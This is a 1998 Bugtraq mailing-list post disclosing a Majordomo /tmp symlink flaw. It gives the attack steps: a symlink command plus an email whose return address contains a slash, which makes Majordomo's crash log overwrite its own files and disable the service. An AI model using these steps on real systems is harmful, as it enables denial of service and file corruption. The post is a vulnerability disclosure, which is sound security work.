[6402] in bugtraq
Majordomo /tmp exploit
daemon@ATHENA.MIT.EDU (Karl G - NOC Admin)
Thu Mar 26 17:31:51 1998
Date: Thu, 26 Mar 1998 15:03:28 -0600
Reply-To: Karl G - NOC Admin <ovrneith@tqgnet.com>
From: Karl G - NOC Admin <ovrneith@TQGNET.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980325104130.450Q-100000@brookie.inconnect.com>
-=desc=-
Majordomo allows appending to any file owned by the majordomo user/group.
-=x-ploit=-
create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug
send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/1234@yourdomain.com
the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable. (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at
all.
--snip--
Subject: MAJORDOMO ABORT (mj_majordomo)
--
MAJORDOMO ABORT (mj_majordomo)!!
HOSTILE ADDRESS (no x400 c=) blah/34234@domain.com
--snip--
-=fix=-
should the wrapper not check for such things?
party on.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Karl Grindley
ICQ: 2660211
Network Administrator
TQG Internet Network
